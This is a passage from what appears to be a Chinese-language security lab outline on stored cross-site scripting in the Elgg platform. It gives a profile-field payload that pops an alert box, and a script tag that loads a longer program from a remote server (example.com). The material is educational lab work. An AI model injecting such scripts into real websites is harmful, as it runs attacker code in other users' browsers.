章节大纲

  • 本任务的目标是在你的 Elgg 个人资料中嵌入一个 JavaScript 程序,使得当其他用户查看你的个人资料时,JavaScript 程序会被执行,在屏幕上弹出一个警告窗口。以下的 JavaScript 程序会显示一个警告窗口:
    <script>alert('XSS');</script>
    如果你在个人资料中(例如简短描述字段)嵌入了上述 JavaScript 代码,那么任何查看你资料的人都会在屏幕上看到警告窗口。

    在上面的例子里,JavaScript 代码很短,可以直接放在简短描述字段。如果你想运行一个较长的 JavaScript 程序,但受限字段长度的限制,你可以将该程序放在一个网站,然后通过 src 属性装载它。以下是一个例子:
    <script type="text/javascript"
        src="http://www.example.com/myscripts.js">
</script>
    在这个例子中,页面将从 http://www.example.com 获取 JavaScript 程序,这可以是任何 web 服务器。